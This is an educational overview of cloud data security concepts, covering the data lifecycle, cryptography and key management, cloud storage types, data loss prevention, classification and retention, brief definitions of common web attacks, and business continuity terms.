Cloud Data Security

The term “cloud data security” is used to describe the safeguards put in place to prevent data breaches, exfiltration, and unauthorized access to any and all data stored in the cloud.

Lifecycle data utilization ( usage ) occurs in five stages.

Data Creation : Data classification is a fundamental security control since it helps the company determine data value and apply relevant controls.
Data Storage : Data storage policies and procedures should regulate things like who has access to what, how access is granted, and how sensitive data is encrypted by default.
Data Usage : Data loss prevention (DLP), information rights management (IRM), technical system access restrictions, authorization and access review processes, network monitoring tools, and so on all contribute to an appropriate level of security.
Data Share : Access-granting and role-based authorizations are proactive access restrictions. DLP, IRM, and access reviews can detect and prevent unwanted data sharing.
Data Archive : Data that has passed its useful life is generally required to be kept for a variety of reasons, such as ongoing legal action or a compliance
Data Destroy : Data that is no longer usable and is no longer required to be retained should be securely destroyed.

Data Dispersion

The term “data dispersion” refers to a method that is used in cloud computing environments to describe the process of dividing data into smaller chunks and storing them on a variety of different physical storage devices.

RAID (Redundant Array of Independent Disks) is a data storage technology that involves the dispersion of data across multiple hard drives for redundancy and performance. For instance, in a RAID 5 configuration, data is striped across several disks with parity information, providing fault tolerance. If one drive fails, the data can be reconstructed from the parity information on the remaining drives, minimizing the risk of data loss.

The majority of cloud professional have included geographic restriction capabilities into their services in order to provide customers with the advantages of dispersion without burdening them with an excessive amount of legal and regulatory complication.

Data Flows

In cybersecurity, data flows refer to the paths that data takes within a system or network. Understanding and monitoring these data flows is crucial for securing information. For example, in a network, data might flow from a user’s device to a server and back. Implementing measures such as encryption, firewalls, and intrusion detection systems helps safeguard these data flows and protect against unauthorized access or malicious activities.

Cryptography

Cryptography encompasses various methods like encryption, which converts readable data into unintelligible form, and decryption, which reverses the process. It’s a vital component in ensuring secure communication and safeguarding sensitive information in fields like computer security and information technology.

Symmetric-key cryptography: Involves using the same key for both encryption and decryption. Examples include the Advanced Encryption Standard (AES) and Data Encryption Standard (DES).
Asymmetric-key cryptography (Public-key cryptography): Uses a pair of public and private keys. The public key is used for encryption, and the private key is used for decryption. Examples include RSA (Rivest–Shamir–Adleman) and Elliptic Curve Cryptography (ECC).
Hash functions: One-way mathematical functions that generate a fixed-size output (hash) from input data. Examples include SHA-256 (Secure Hash Algorithm 256-bit) and MD5 (Message Digest Algorithm 5).
Digital signatures: Provide a way to verify the authenticity and integrity of a message or document. Examples include DSA (Digital Signature Algorithm) and ECDSA (Elliptic Curve Digital Signature Algorithm).

These cryptographic methods are used in various combinations to achieve different security objectives.

A cipher suite refers to a set of cryptographic algorithms that are used to secure network communication. It includes protocols for key exchange, encryption, and message authentication. The combination of these algorithms is crucial for establishing a secure communication channel. Common components of a cipher suite include:

Key Exchange Algorithm: Determines how cryptographic keys are exchanged between parties. Examples include Diffie-Hellman (DH) and Elliptic Curve Diffie-Hellman (ECDH).
Cipher (Encryption) Algorithm: Specifies how the actual data is encrypted. Examples include AES (Advanced Encryption Standard) and 3DES (Triple Data Encryption Standard).
Message Authentication Code (MAC) Algorithm: Ensures the integrity of the transmitted data. Examples include HMAC (Hash-Based Message Authentication Code).
Hash Function: Used for various purposes, such as generating digital signatures or deriving keys. Examples include SHA-256 and SHA-3.

Cipher suite management involves selecting appropriate cipher suites for a particular application or system, considering factors like security, performance, and compatibility. It also includes periodic updates to ensure that cryptographic protocols remain resilient against evolving threats. Administrators often configure systems to prioritize more secure cipher suites while avoiding those with known vulnerabilities. This ongoing management is crucial for maintaining the security of encrypted communications.

Key Management

Cryptography key management involves the generation, distribution, storage, and disposal of cryptographic keys to ensure secure communication. Here are key aspects:

Key Generation: Creating strong, random keys using reliable algorithms. For example, in symmetric encryption, keys need to be unique and unpredictable.
Key Distribution: Securely delivering keys to authorized parties. In symmetric cryptography, this is especially challenging as both parties need the same key without interception.
Key Storage: Safeguarding keys against unauthorized access. Hardware security modules (HSMs) or secure key storage practices are common.
Key Update: Regularly changing keys to enhance security. Frequent key updates are crucial in maintaining a robust cryptographic system.
Key Usage: Clearly defining how keys are utilized, including encryption, decryption, digital signatures, etc.
Key Revocation: Disabling compromised or unauthorized keys to prevent their misuse. Timely key revocation is essential for maintaining security.
Key Destruction: Ensuring secure disposal of keys that are no longer needed. This prevents the potential misuse of obsolete keys.
Key Backup and Recovery: Implementing procedures for key backup to prevent data loss and establishing recovery mechanisms if keys are lost.
Key Escrow: In certain scenarios, especially in public-key cryptography, arrangements might be made for a trusted third party to hold a copy of cryptographic keys.

Effective key management is fundamental to the security of cryptographic systems. Automated tools and secure protocols play a crucial role in simplifying key management processes while minimizing the risk of key compromise. Regular audits and assessments are also vital to ensuring the ongoing effectiveness of key management practices.

Cloud Service Provider (CSP) Responsibilities:

Key Generation and Storage: The CSP is often responsible for generating and securely storing cryptographic keys used for various purposes, such as encrypting customer data at rest.
Key Rotation: Implementing key rotation policies to regularly update cryptographic keys to enhance security.
Access Controls: Managing access controls to restrict access to keys, ensuring that only authorized personnel within the CSP have the necessary permissions.
Compliance: Ensuring that key management practices comply with industry standards and regulatory requirements.

Customer-Managed Responsibilities:

Key Usage: Customers are responsible for using cryptographic keys appropriately within their applications and systems.
Key Distribution: Distributing keys securely to their intended recipients, especially in scenarios like secure communication between different components of a cloud-based application.
Key Revocation: Taking action to revoke and replace keys if they are compromised or if personnel changes within the customer organization.
Integration: Integrating cryptographic functions into their applications, ensuring that keys are properly handled within the customer’s environment.

Collaboration:

Key Exchange: Collaboratively establishing secure key exchange protocols for scenarios where secure communication involves both the CSP and the customer.
Incident Response: Collaborating in incident response efforts, especially in situations where a compromise affects both the CSP and the customer.

In a customer-managed approach, the customer has more direct control over cryptographic keys, allowing for greater customization and alignment with specific security requirements. However, both parties need to collaborate to ensure a secure and cohesive overall system. The specific responsibilities can vary based on the service models (IaaS, PaaS, SaaS) and the agreed-upon terms between the CSP and the customer.

A Pseudorandom Number Generator (PRNG) is a fundamental component in cybersecurity used for generating sequences of numbers that appear random. However, unlike true random numbers, PRNGs are deterministic and rely on an initial value called a seed. Here are key aspects of PRNGs in cybersecurity:

Cryptographic PRNGs (CPRNGs): Specifically designed for use in cryptographic applications, CPRNGs must satisfy additional criteria for unpredictability and resistance to certain attacks. They are crucial for generating cryptographic keys and nonces.
Entropy Source: PRNGs require a source of entropy (unpredictable input) for their initial seed. In cybersecurity, obtaining sufficient entropy is critical to ensure the randomness and security of generated numbers.
Seed Management: Protecting the initial seed value is crucial, as knowledge of the seed can compromise the entire sequence of pseudorandom numbers. Cryptographic systems often employ secure methods for seed generation and storage.
Periodicity: PRNGs have a finite cycle after which they repeat their sequence. Cryptographically secure PRNGs aim to have exceedingly long periods, making it computationally infeasible to predict future values even with knowledge of past values.
Use Cases: PRNGs are extensively used in cybersecurity for tasks such as generating cryptographic keys, initialization vectors (IVs), nonces, and random challenges in authentication protocols.
Testing and Validation: Cryptographic PRNGs undergo rigorous testing to ensure they meet specified security requirements. Common tests include checking for uniformity, independence, and resistance to statistical attacks.
Secure Applications: Cryptographic protocols, secure communication, digital signatures, and other cybersecurity mechanisms heavily rely on the unpredictability and security of pseudorandom numbers.
Hardware RNGs: For higher levels of security, some systems use Hardware Random Number Generators (HRNGs), which exploit physical processes (like electronic noise) to generate true random numbers.
Entropy Accumulation: Systems continuously gather entropy from various sources to reseed PRNGs and maintain a high level of unpredictability, especially in long-running applications.

Cloud Data Storage

When using cloud services, one of the most important things is that resources are shared. While virtualized storage pools offer greater flexibility than standalone hard drives or storage area networks, it can be challenging to determine where and how much data is being kept within such large pools.

IaaS (Infrastructure as a service)

Ephemeral : Ephemeral storage doesn’t store data for long. Ephemeral storage, like RAM and other volatile memory architectures, lasts as long as an IaaS instance is running and is lost when the virtual machine is powered down. Modern operating systems require temporary storage for system files and memory swap files, hence ephemeral storage is generally bundled as computational capabilities rather than storage.
Raw : Raw device mapping (RDM) allows a VM to access its LUN, which is a piece of the storage capacity designated to it.
Long-term : Long-term storage is durable, permanent storage media used for records preservation and data archiving. Search, data discovery, and immutable storage for data integrity may be offered via the storage.
Volume : Cloud data storage uses virtualized computers and drives for volume storage. Volume storage can distribute data in specified blocks. Virtualized discs can break data into blocks and store them over numerous physical drives, together with erasure coding to rebuild lost blocks.
Object : Files are the most common objects used to store and retrieve data, and file browsers allow users to navigate and work with this data.

PaaS ( Platform as a service )

Disk : Connecting a PaaS instance to a virtual disc, which can be a volume or an object store.
Databases : Popular database software can be given as a service, where data is accessed via API calls to the database in a multitenant approach.
Binary Large Object (blob) : Unstructured data, such as blobs, does not follow a data model like a database’s columns.

SaaS ( Software as a service ) :

Data storage format is meant to facilitate a web-based application that stores and retrieves data. Content file share, content delivery network etc..

Threats to Storage Types

Example : Unauthorized access, Unauthorized provisioning, Regulatory noncompliance, Jurisdictional issues , Denial of service, Data corruption or destruction, Theft or media loss, Malware and ransomware, Improper disposal

Data Security Technologies

Encryption and Key Management

Data is encrypted by performing mathematical changes. The cryptographic system transforms data using a key or cryptovariable. If the encrypted data, cryptovariable, and algorithm are known, the encryption procedure can be reversed.

Storage-level, Volume-level, Object-level, File-level, Application-level, database-level

Hashing (one-way encryption)

Hash functions use mathematical procedures to create a unique hash value for any input length. This operation can be repeated and the two hash values compared to see if the input data has changed. Mismatched hash values indicate data alteration.

Some antimalware and intrusion detection systems monitor important system files for changes, and highly secure systems may hash hardware data including manufacturer, devices connected, and model numbers.

Hashes are an essential component of digital signatures, which allow users to verify the integrity as well as the source of a message, file, or other data.

collision resistant: Collisions occur when two inputs provide the same hash value. The hash function cannot ensure integrity in that case.

Data Obfuscation

Data from a production environment can be duplicated for testing reasons, but any sensitive information should be masked or replaced using obfuscation. While testers may not have access to the live data, they can still do their work using the similarly-functioning fake data.

Masking

Masking is a technique that is very similar to obfuscation. It is utilized to protect sensitive data from being disclosed to unauthorized parties without actually eliminating the data.

Anonymization

The technique of securing private or sensitive information by removing or encrypting identifiers that link an individual to stored data is known as data anonymization.

Tokenization

Tokenization is the process of replacing private information with a generic substitute called a token

By submitting the appropriate request to the tokenization service, which typically contains access controls to confirm user identities and authorization to see sensitive data, tokens can be linked back to the original data.

Forensics

Identifying, collecting, preserving, analyzing, and summarizing/reporting digital information and evidence is the domain of forensics, which is the use of scientific and methodical techniques to achieve these ends.

Data Loss Prevention

Data leakage prevention (DLP) is a technological system that identifies, inventories, and controls sensitive data in an organization. Controls include detective, preventative, and corrective.

Discovery: Data assets must be identified, categorized, and inventoried by the organization.
Monitoring: Assist the security team monitors data use and identifying any suspicious activity.
Enforcement: Rules are applied depending on monitoring findings to implement security policies

Supporting technologies provide security measures for information systems. Encryption techniques support keys, access control systems use shared secrets to authenticate users or connection requests, and digital certificates are used for mutual authentication and access control.

Keys: Encryption keys can uniquely identify users and systems. Since encryption techniques are publicly known and encrypted data is regularly transmitted over untrusted networks, key security is vital. Keys should be encrypted and protected with a strong passphrase or MFA.
Secrets: Secrets are used to confirm that a message has not been intercepted. Access to storage must be closely restricted.
Certificates: A trusted public key can be used to encrypt asymmetrically with a certificate. This is used to securely send session keys and secrets to remote hosts across untrusted connections.

Public key infrastructure (PKI) must be well-designed to provide certificates to trusted parties. To prevent malevolent users from accessing or transferring access token certificates, they may need extra access control like keys and secrets.

Implement Data Discovery

helps to compile a list of the essential data assets that your firm needs to secure.

Data discovery is used by many security technologies, particularly those monitoring large-scale installations of user workstations, servers, and cloud services. System vulnerabilities, misconfigurations, intrusion attempts, and unusual network activities can be identified using analysis tools to drive security operations.

Normalization: Normalization converts data from multiple formats to a common format. Data is retrieved from databases or apps, transformed to match the warehouse’s data model, then loaded into warehouse storage. This is called extract, transform, load (ETL). Normalizing data enhance searchability.
Data Mart: A data mart contains data that has been warehoused, analyzed, and made
available for specific use like sales forecasting. Data marts typically support a specific
business function by proactively gathering data needed and performing analysis and
then presenting the data needed for reporting and decision-making.
Data Mining: The process of “mining” data is looking for, identifying, and extracting meaningful patterns from large amounts of data.
Online analytic processing (OLAP): In order to facilitate analytical processing for a data source, OLAP makes it available to users. The three main features of online analytical processing, or OLAP, are consolidation, drill-down, and slice-and-dice.

Data Classification

Classification of data is the process of organizing data into categories based on shared characteristics. The practice of assigning a particular system or huge data collection to a certain category is sometimes referred to as “categorization.” in order to collect needs for keeping the system’s privacy, security, and uptime in check.

Data type, Legal constraints, Ownership, Value/criticality

Sensitive Data Types: Personally identifiable information (PII), Protected health information (PHI), and Cardholder data environment or CDE -PCI DSS

Mapping

Metadata, such as asset ownership such as a person, role, or organizational unit, can be identified through mapping to give the business valuable insight into who is responsible for what in terms of security.

Labeling

The categorization level of a data set or system must be conveyed to users, administrators, and other stakeholders to secure it. Labels simplify communication.

Data Retention Policies, Practices, Archiving, Deletion & Hold

Data and records are often used interchangeably in regulatory documents. Data retention rules should balance availability, compliance, and operational goals including cost.

HIPAA: Six-year retention period ( USA )
EU GDPR: EU citizens allow indefinite retention as long as a data subject consents and the business has a legitimate purpose for the data. If consent is withdrawn or the organization no longer needs the data, it must delete, destroy, or anonymize it.

Practices: Schedules, Integrity checking, Retrieval procedures, Data formats
Archiving: Integrating a blockchain ledger with a company’s storage solution would provide unchangeable proof that the data stored there has not been tampered with.
Deletion: Clear, Purge ( Cryptographic erasure, or crypto shredding), and Destroy.
Legal Hold: Data retention is affected by legal hold. Data on legal hold is kept indefinitely.

eDiscovery Processes

ISO/IEC 27050 seeks to standardize eDiscovery techniques and best practices globally. It includes all eDiscovery steps: identification, preservation, collection, processing, review, analysis, and data generation.

Multitenancy

In cloud computing, multitenancy refers to the sharing of a cloud provider’s computer resources between several users. Users in the cloud do not know about or interact with one another, and their data is kept completely isolated from one another even if they share resources. For cloud services to be truly useful, multitenancy must be present.

Identification, Preservation, Collection, Processing, Review , and Production

Simple Object Access Protocol ( SOAP )

Simple Object Access Protocol is the full name for the acronym SOAP. Web services allow for the exchange of structured data during the networking process. One such communications protocol is Simple Object Access Protocol (SOAP), which is favored for its many desirable qualities. XML (eXtensible Markup Language) is used as the message format, while application layer protocols like HTTP and SMTP are used for negotiation and transmission.

While the REST API supports caching, SOAP does not.

Security Terms

Cross-site scripting (XSS)

Cross-site scripting (XSS) occurs when a malicious actor sends untrusted data to a user’s browser without validation, sanitization, or browser escape. The code is then performed on the user’s browser with the user’s access and permissions, allowing an attacker to reroute web traffic, steal session data, or even access anything on the user’s machine that their browser can access.

Injection

An attacker injects data into an application to modify the meaning of commands issued to a reader.

In an injection attack, a malicious attacker transmits instructions or other arbitrary data through input and data fields to have the application or system run the code as part of its usual processing and queries.

Uptime Institute

When it comes to data center tiers and topologies, the standard published by the Uptime Institute is by far the most extensively used and well-known. It’s built on a tiered architecture with four levels; higher numbers indicate more strict and dependable security, connection, fault tolerance, redundancy, and cooling measures.

International Data Center Authority (IDCA)

The International Data Center Authority (IDCA) guidelines established the Infinity Paradigm, a complete data center architecture, and operating framework. Many data center models use tiered design to increase redundancy, however, the Infinity Paradigm does not. It stresses data centers being approached macro-level, without a specific and isolated concentration on key aspects to reach tier status.

Inter-cloud provider

The inter-cloud service provider is accountable for administering federations and federated services, as well as peering with other cloud service providers.

Cloud services brokerage (CSB)

It is a firm or other organization that aggregates, integrates, and customizes one or more (public or private) cloud services on behalf of one or more consumers of that service

REST API

It uses and relies on the HTTP protocol .The Representational State Transfer (REST) API often employs caching to improve scalability and efficiency, and the most popular data formats are JavaScript Object Notation (JSON) and Extensible Markup Language (XML).

Safe Harbor

European privacy policies restrict the export or exchange of PII from Europe to the US due to the US’s absence of a federal privacy statute. Organizations can opt into the Safe Harbor program, but they must follow EU-like rules and regulations.

Gramm Leach Bliley Act (GLBA)

The Gramm Leach Bliley Act (GLBA), also known as the Financial Services Modernization Act, applies to U.S. financial institutions and secures non-public personal information including financial records.

Cross-site request forgery (CSRF) Attack

This attack forces a user’s client to make forged requests under the user’s credentials to execute instructions and requests the application thinks are coming from a trusted client and user. Since the attacker cannot see the results of the commands, this form of attack opens up new ways to compromise an application.

Missing Function Level Access Control

When there aren’t enough authorization checks for critical request handlers, a security hole exists at the function level. With this widespread flaw, attackers can gain access to protected data by elevating their privileges to a higher function. Typically, the attacker is a legitimate user of the system who has gained access to the system and then abuses a privileged function parameter to issue malicious requests.

Cloud service manager

The cloud service manager is responsible for cloud service delivery, cloud service provisioning, and cloud service administration in general.

Business Continuity

After a disaster, business continuity planning ensures the company can continue operations

Business continuity plan (BCP) or continuity of operations plan (COOP).

Recovery Time Objective

The recovery time target can be determined based on how long an organization is willing to function without a system (RTO).

A business impact study classifies all systems by business criticality called “business impact analysis (BIA)”. All systems should have a maximum acceptable downtime called maximum tolerable downtime (MTD) once prioritized. System disruptions will be significant if the RTO is greater than the MTD.

Recovery Time Objective is a decision that should be made by the business rather than the IT department.

Recovery Point Objective

When calculating how much data can be lost in the event of a disaster or other system disruption, businesses use a measure called the Recovery Point Objective.

In most cases, a backup strategy will be designed and run in accordance with the Recovery Point Objective.

Example : Grandfather-father-son backup (GFS) involves daily, weekly, and monthly backup cycles.

Cloud storage solutions are designed for strong data durability, making a low RPO cost-effective. Data is replicated and saved in several locations for recovery in the event of a system breakdown

Recovery Service Level

Computing resources needed to keep production environments functioning during a disaster and also In the following a disaster, non-production environments can be stopped to save resources.

Objectives during a disaster include maintaining essential production systems and business operations until the situation stabilises enough to allow for a return to business as usual.